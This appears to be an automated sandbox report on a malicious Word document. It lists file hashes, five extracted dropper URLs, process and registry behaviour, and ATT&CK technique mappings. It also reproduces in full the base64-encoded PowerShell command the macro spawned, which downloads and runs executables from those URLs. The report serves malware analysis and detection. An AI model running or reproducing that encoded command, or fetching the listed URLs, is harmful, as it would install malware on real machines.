f0ede2a03f4ea0117da4f47c3041d9a0d9876c374f4b74cee6e8b6dab2b31e4a

General

Target

bf45087f13a09d21ade58860cf19c0a0_JaffaCakes118.doc
Size

457KB
MD5

bf45087f13a09d21ade58860cf19c0a0
SHA1

d5cc18efefd6e5525ea68c3089505f9464fa6f40
SHA256

f0ede2a03f4ea0117da4f47c3041d9a0d9876c374f4b74cee6e8b6dab2b31e4a
SHA512

f1c8f568c2d4349c6f8f3ab0eacffef6b79507fc8496dd0f9960e28cafd8c613b9c5c98eb66ff0aa0c0ee79ef247275dd4dfbce404130ef1d4a1a6e0c4aee548
SSDEEP

6144:VOENtkhRuof+qDbk3XWp4gMzSVIhl9EKRDqME4yanMjdn/NQVg+D3Do8oRtxQwvM:VO8khg2wW4g8SVIf51E4K14o8Iuj

Score

10^/10

discovery

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://honkytonk-studio.com/Kw0rSq2FAX

exe.dropper

http://allaboutpoolsnbuilder.com/ULKMiATT

exe.dropper

http://bobvr.com/8GI2mvob6L

exe.dropper

http://spathucung.info/KyzWn62

exe.dropper

http://precounterbrand.com/UtbBjWRRG

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2968	1344	powershell.exe	29

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WINWORD.EXE

Office loads VBA resources, possible macro or embedded object present

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
708	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2968	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2968	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
708	WINWORD.EXE
708	WINWORD.EXE

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 708 wrote to memory of 368	708	WINWORD.EXE	33
PID 708 wrote to memory of 368	708	WINWORD.EXE	33
PID 708 wrote to memory of 368	708	WINWORD.EXE	33
PID 708 wrote to memory of 368	708	WINWORD.EXE	33

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\bf45087f13a09d21ade58860cf19c0a0_JaffaCakes118.doc"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:708
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:368

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -e JABsADIANwAxADMAOQA9ACgAJwBaADgANwA4ADcAMQAnACsAJwA0AF8AJwApADsAJAByADIAXwA4ADYAMQA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABqAF8ANQAwADEAXwAxADMAPQAoACcAaAAnACsAJwB0AHQAcAA6AC8ALwBoACcAKwAnAG8AbgAnACsAJwBrAHkAdABvAG4AawAtAHMAJwArACcAdAB1AGQAaQBvACcAKwAnAC4AYwBvAG0ALwBLAHcAMAByAFMAcQAyAEYAQQAnACsAJwBYAEAAaAB0AHQAcAA6AC8ALwBhAGwAJwArACcAbABhAGIAbwB1ACcAKwAnAHQAcABvAG8AbABzAG4AYgB1AGkAbAAnACsAJwBkAGUAcgAuAGMAJwArACcAbwBtAC8AJwArACcAVQBMAEsATQAnACsAJwBpAEEAVABUAEAAaAB0AHQAcAA6AC8ALwAnACsAJwBiAG8AYgB2ACcAKwAnAHIALgBjAG8AJwArACcAbQAvADgARwBJACcAKwAnADIAbQAnACsAJwB2AG8AYgA2AEwAQABoACcAKwAnAHQAdABwADoALwAnACsAJwAvAHMAcABhAHQAaAAnACsAJwB1AGMAdQBuACcAKwAnAGcALgBpAG4AZgBvACcAKwAnAC8ASwB5AHoAVwBuADYAMgBAAGgAdAB0AHAAOgAnACsAJwAvAC8AcAByACcAKwAnAGUAJwArACcAYwBvAHUAbgB0AGUAcgBiAHIAYQAnACsAJwBuAGQALgBjAG8AbQAvAFUAdABiAEIAagBXAFIAUgBHACcAKQAuAFMAcABsAGkAdAAoACcAQAAnACkAOwAkAGwAMQBfADQAOQA0ADcAPQAoACcAawA1AF8AJwArACcAMABfAF8AJwApADsAJABjAF8AOQBfAF8AXwBfADcAIAA9ACAAKAAnADMAJwArACcANwA3ACcAKQA7ACQAbgAwADQANQA0ADAAXwBfAD0AKAAnAFQAJwArACcAOAA5AF8AMAAnACsAJwA2ACcAKQA7ACQAbQA2AF8AXwA5ADYAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAGMAXwA5AF8AXwBfAF8ANwArACgAJwAuACcAKwAnAGUAeABlACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAEUAMAA4ADYAOQA3ADcAIABpAG4AIAAkAGoAXwA1ADAAMQBfADEAMwApAHsAdAByAHkAewAkAHIAMgBfADgANgAxAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAEUAMAA4ADYAOQA3ADcALAAgACQAbQA2AF8AXwA5ADYAKQA7ACQAVQA3ADgAMwA5AF8AOQBfAD0AKAAnAHMAOAAnACsAJwBfACcAKwAnADIANAA0ADIAJwApADsASQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAbQA2AF8AXwA5ADYAKQAuAGwAZQBuAGcAdABoACAALQBnAGUAIAA0ADAAMAAwADAAKQAgAHsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAJABtADYAXwBfADkANgA7ACQAVQBfADEANQBfADEAPQAoACcAWgAyADcAJwArACcAMwA1ADIAJwArACcAXwBfACcAKQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAewB9AH0AJABpADIANgBfADQAMwA1AD0AKAAnAE0ANQA0ACcAKwAnADUAXwA0ADIAJwArACcANgAnACkAOwA=
1⤵
- Process spawned unexpected child process
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2968

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
19KB

MD5
3a85beaece86a212d50817c7ea160480

SHA1
4ae409e7a6480d78fcd79fb58e23dd354e87f19e

SHA256
2db02afb29320c6a49eb17235820a5d6942311c3dfbec8e3ff64c8dab2612d20

SHA512
701309d182a2e2d55fb4eeab42e65c933b213b2f81e036e477b1f4b61b4baa50243d0a1d5937af92850233967593e52abb012b81998cc932e43a253b999d5c39

Download Submit
memory/708-118-0x0000000005990000-0x0000000005B90000-memory.dmp

Filesize
2.0MB

Download
memory/708-141-0x0000000070C1D000-0x0000000070C28000-memory.dmp

Filesize
44KB

Download
memory/708-100-0x0000000005990000-0x0000000005B90000-memory.dmp

Filesize
2.0MB

Download
memory/708-71-0x0000000005990000-0x0000000005B90000-memory.dmp

Filesize
2.0MB

Download
memory/708-99-0x0000000005990000-0x0000000005B90000-memory.dmp

Filesize
2.0MB

Download
memory/708-103-0x0000000005990000-0x0000000005B90000-memory.dmp

Filesize
2.0MB

Download
memory/708-102-0x0000000005990000-0x0000000005B90000-memory.dmp

Filesize
2.0MB

Download
memory/708-101-0x0000000005990000-0x0000000005B90000-memory.dmp

Filesize
2.0MB

Download
memory/708-43-0x0000000005990000-0x0000000005B90000-memory.dmp

Filesize
2.0MB

Download
memory/708-2-0x0000000070C1D000-0x0000000070C28000-memory.dmp

Filesize
44KB

Download
memory/708-115-0x0000000070C1D000-0x0000000070C28000-memory.dmp

Filesize
44KB

Download
memory/708-140-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/708-116-0x0000000005990000-0x0000000005B90000-memory.dmp

Filesize
2.0MB

Download
memory/708-117-0x0000000005990000-0x0000000005B90000-memory.dmp

Filesize
2.0MB

Download
memory/708-0-0x000000002FC71000-0x000000002FC72000-memory.dmp

Filesize
4KB

Download
memory/708-119-0x0000000005990000-0x0000000005B90000-memory.dmp

Filesize
2.0MB

Download
memory/708-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2968-109-0x000000001B3C0000-0x000000001B6A2000-memory.dmp

Filesize
2.9MB

Download
memory/2968-110-0x0000000001D70000-0x0000000001D78000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads